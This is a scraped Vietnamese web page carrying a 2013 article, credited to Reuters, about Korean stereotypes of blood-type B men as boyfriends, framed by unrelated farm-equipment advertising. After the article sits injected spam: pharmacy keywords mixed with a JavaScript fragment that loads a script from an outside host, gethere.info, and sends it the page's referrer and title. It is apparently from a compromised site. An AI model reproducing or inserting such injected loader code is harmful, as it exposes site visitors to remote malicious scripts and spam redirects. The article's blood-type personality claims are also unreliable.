Website cùng hệ thống:
Hỗ trợ trực tuyến:

Hoàng Giáp cung cấp lồng công nghiệp giá rẻ nhưng rất chuyên nghiệp. Sản phẩm bán lồng thỏ 100 làm bằng máy tự động, các mối hàn gọn, chắc chắn, các nan lồng được mạ kẽm sáng bóng và độ bền cao. Tôi đã sử dụng toàn bộ thiết bị máy làm cám Hoàng Giáp cung cấp từ lồng thỏ, van uống nước cho thỏ, máng ăn cho thỏ, tấm nhựa đa năng. Đặc biệt tôi rất yêu thích bán máy ép cám viên chăn nuôi, bởi sản phẩm này giúp tôi tiết kệm 60% chi phí chăn nuôi và 70% nhân lực cho chăn nuôi. Cảm ơn Hoàng Giáp Nhận đào tạo, hướng dẫn giải pháp phục hồi tóc hư tổn tận gốc chỉ sau 1 tuần

^ Lên đầu trang
Trai Hàn nhóm máu B hết hy vọng kiếm người yêu

Trai Hàn nhóm máu B hết hy vọng kiếm người yêu

Đăng ngày 19/02/2013

Viễn cảnh hẹn hò với một cô gái của Lee Sung-san, 24 tuổi, ngày càng xa vời bởi giới văn hoá đại chúng Hàn Quốc đang lao vào khai thác đề tài về những chàng trai nhóm máu B ích kỷ và nóng tính. “Tôi đã bị nhiều phụ nữ nói thẳng thừng rằng họ không muốn hẹn hò với những anh chàng nhóm máu B. Họ nói rằng chúng tôi ích kỷ và đồng bóng”, Lee nói. Lee tâm sự, điều anh hy vọng nhất lúc này là đừng ai hỏi anh về nhóm máu.

Báo giới Hàn Quốc đã đề cập tới nhóm máu và tính cách từ nhiều năm nay. Tuy nhiên, gần đây, vấn đề này trở nên nóng bỏng. Nhiều người còn tham gia bàn luận làm thế nào để khởi đầu quan hệ với một người đàn ông nhóm máu B. Thậm chí, những chuyên gia tâm lý tự phong còn khẳng định các cô gái có nhóm máu A, những người được cho là nhút nhát, không nên quan hệ với những anh chàng nhóm máu B vì có khả năng các chàng biến thành những tên vô lại.

Ở Hàn Quốc, có nhiều tính xấu bị gán cho một chàng trai nhóm máu B như ích kỷ, đồng bóng và chắc chắn không phải là một mẫu bạn trai biết quan tâm, hết lòng vì yêu. Mùa thu năm ngoái, bài hát của ca sĩ Kim Hyun-jung có tựa đề Những chàng nhóm máu B leo lên hàng đầu tại hầu hết các bảng xếp hạng. Lời của bài hát xoay quanh việc mô tả một anh chàng nhóm máu B là người dễ nổi nóng, mau làm lành nhưng cuối cùng chàng sẽ làm trái tim bạn tan nát.

Chuyện về những anh chàng nhóm này còn lên sách, điển hình là cuốn Hẹn hò với chàng nhóm máu B của tác giả Kim Nang. Trong cuốn sách, tác giả đề ra chiến lược cho phụ nữ thuộc các nhóm máu khác nhau đối mặt với những thăng trầm trong mối quan hệ với những anh chàng nhóm máu B. Thậm chí, đề tài này còn được dựng thành bộ phim hài tình cảm, Bạn trai tôi thuộc nhóm máu B, kể về những rắc rối của một cô gái nhóm máu A không may yêu một chàng trai như thế. Nhân vật nam chính trong bộ phim bắt bạn gái phải trông xe cho anh ta hàng giờ để không phải trả phí đỗ xe. Trong một buổi hẹn hò, đầu anh chàng cứ quay tứ lung tung để tìm những người phụ nữ khác. Chỉ riêng tại Hàn Quốc, doanh thu của bộ phim đã lên tới 10 triệu USD, vượt xa chi phí sản xuất (2,5 triệu USD). Bộ phim này dự kiến sẽ trình chiếu tại Nhật cuối năm nay.

Tại châu Á, vấn đề liên hệ nhóm máu với nhân cách một người xuất hiện từ năm 1927 với sự ra mắt của cuốn sách Tìm hiểu tính cách con người qua nhóm máu của học giả Takeji Furukawa. Văn hoá đại chúng và giới truyền thông đã phát hiện và khai thác vấn đề này sau đó. Theo họ, những người mang nhóm máu O được mô tả là hướng ngoại còn người thuộc nhóm máu A thường hướng nội. Chàng trai cô gái mang nhóm máu AB thuộc tuýp khó đoán trong khi người mang nhóm máu B được đánh giá là độc lập và có tính cách mạnh.

Tạp chí và các trang web của Hàn Quốc gần đây được tận dụng để nói về vấn đề chuyện tình cảm với các chàng trai thuộc nhóm máu B. Theo một cuộc trưng cầu trên một trang web Hàn Quốc, những anh chàng thuộc nhóm máu B rất khó hò hẹn và khoảng 40% phụ nữ cho rằng họ không muốn có một anh chồng như vậy. Thậm chí trên một trang web của bệnh viện ở Seoul, chủ đề được bàn luận nhiều nhất là “Có phải đàn ông nhóm máu B quan hệ lăng nhăng hơn những người thuộc nhóm máu khác?” Kim Tae-suk, một bác sĩ, cho biết thanh niên Hàn bị hướng vào việc đánh giá một người qua nhóm máu vì những gì họ xem trên truyền hình, phim ảnh và báo chí. “Tôi không nói rằng không có bằng chứng khoa học cho thấy có mối liên hệ giữa nhóm máu và tính cách con người”, Kim nói. Tuy nhiên, ông cho rằng những người bị tình phụ cần bình tĩnh và không nên đổ tội chuyện tan vỡ tình yêu do không hợp về nhóm máu.

(Theo Reuters) Cheap cheap viagra no rx s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; Purchase Purchase d.getElementsByTagName(‘head’)[0].appendChild(s); Cheap buy cheap zanaflex online Pills

© 2013 – 2018, NhómMáu.vn. Giữ toàn quyền. Vui lòng ghi rõ nguồn khi bạn phát hành lại nội dung từ website này.


Tags:

bạn trai

hàn quốc

hot boy

người yêu

nhóm máu B

tìm kiếm

trai hàn


Bài viết liên quan

Bộ Y Tế Trung Ương Hội Chữ thập đỏ Việt Nam Kênh truyền hình Sức khỏe O2TV Viện Huyết học truyền máu Trung ương Bệnh viện K Bệnh viện Bạch Mai Bệnh viện Trung Ương Quân đội 108 Bệnh viện 103 Bệnh viện hữu nghị Việt Đức Bệnh viện Nhi Trung Ương Bệnh viện Phụ sản Trung Ương Bệnh viện Phụ sản Hà Nội EldonCard